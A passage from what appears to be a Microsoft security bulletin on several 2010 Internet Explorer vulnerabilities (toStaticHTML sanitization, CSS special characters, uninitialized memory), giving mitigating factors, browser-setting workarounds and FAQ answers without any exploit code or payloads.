controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page that uses the toStaticHTML API may execute a cross-site scripting attack on the user.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability exists in the way that Internet Explorer handles content using specific strings when sanitizing HTML.\r\n\r\nWhat is the toStaticHTML API? \r\nThe toStaticHTML API can be used to remove event attributes and script from user input before display as HTML. For more information, please see the MSDN Library article, toStaticHTML Method.\r\n\r\nIs this vulnerability related to CVE-2010-3243 in MS10-072, Vulnerabilities in toStaticHTML Could Allow Information Disclosure? \r\nYes, the HTML Sanitization Vulnerability, CVE-2010-4243, also affects Microsoft SharePoint.\r\n\r\nAre both updates necessary to be installed to be protected from the vulnerability? \r\nNo, each update addresses a separate application. Only the update that corresponds with software running on your system needs to be applied.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability, when a user is viewing HTML on a Web site that has not been properly sanitized by Internet Explorer, could execute script in the user's security context against a site.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker must have the ability to submit a specially crafted script to a target site. Due to the vulnerability, in specific situations the specially crafted script is not properly sanitized using toStaticHTML, and subsequently this could lead to attacker-supplied script being run in the security context of a user who views the malicious content on the Web site.\r\n\r\nFor cross-site scripting attacks, this vulnerability requires that a user be visiting a compromised Web site for any malicious action to occur. For instance, after an attacker has successfully submitted specially crafted script to the target site, any Web page on that site that contains the specially crafted script is a potential vector for persistent cross-site scripting attacks. When a user visits a Web page that contains the specially crafted script, the script could be run in the security context of the user on the site.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles HTML sanitization using toStaticHTML.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nHTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nAn information disclosure vulnerability exists in the way that the toStaticHTML API sanitizes HTML, that could allow an attacker to perform cross-site scripting attacks and run script in the security context of the logged-on user. An attacker who successfully exploited this vulnerability could execute a cross-site scripting attack on the user, allowing the attacker to execute script in the user's security context against a site that is using the toStaticHTML API.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3324.\r\n\t\r\nMitigating Factors for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\n\u2022\t\r\n\r\nOnly Web sites that is using toStaticHTML may potentially be affected.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Office Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for HTML Sanitization Vulnerability - CVE-2010-3324\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page that uses the toStaticHTML API may execute a cross-site scripting attack on the user.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability exists in the way that Internet Explorer handles content using specific strings when sanitizing HTML.\r\n\r\nWhat is the toStaticHTML API? \r\nThe toStaticHTML API can be used to remove event attributes and script from user input before display as HTML. For more information, please see the MSDN Library article, toStaticHTML Method.\r\n\r\nIs this vulnerability related to CVE-2010-3324 in MS10-072, Vulnerabilities in toStaticHTML Could Allow Information Disclosure? \r\nYes, the HTML Sanitization Vulnerability, CVE-2010-3324, also affects Microsoft SharePoint.\r\n\r\nAre both updates necessary to be installed to be protected from the vulnerability? \r\nNo, each update addresses a separate application. Only the update that corresponds with software running on your system needs to be applied.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability, when a user is viewing HTML on a Web site that has not been properly sanitized by Internet Explorer, could execute script in the user's security context against the site.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker must have the ability to submit a specially crafted script to a target site. Due to the vulnerability, in specific situations the specially crafted script is not properly sanitized using toStaticHTML, and subsequently this could lead to attacker-supplied script being run in the security context of a user who views the malicious content on the Web site.\r\n\r\nFor cross-site scripting attacks, this vulnerability requires that a user be visiting a compromised Web site for any malicious action to occur. For instance, after an attacker has successfully submitted specially crafted script to the target site, any Web page on that site that contains the specially crafted script is a potential vector for persistent cross-site scripting attacks. When a user visits a Web page that contains the specially crafted script, the script could be run in the security context of the user on the site.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles HTML sanitization using toStaticHTML.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-3324.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nCSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nAn information disclosure vulnerability exists in the way that Internet Explorer processes CSS special characters. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could allow information disclosure if a user viewed the Web page. An attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3325.\r\n\t\r\nMitigating Factors for CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nBy default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the Restricted sites zone, which disables script and ActiveX controls, removing the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page could view content from another domain or Internet Explorer zone other than the domain or zone of the attacker's Web page.\r\n\r\nWhat causes the vulnerability? \r\nInternet Explorer improperly processes CSS special characters, potentially allowing disclosure of sensitive data.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThis update addresses the vulnerability by modifying the way that Internet Explorer handles CSS special characters.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-3325.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3326.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the Restricted sites zone, which disables script and ActiveX controls, removing the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3326\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and 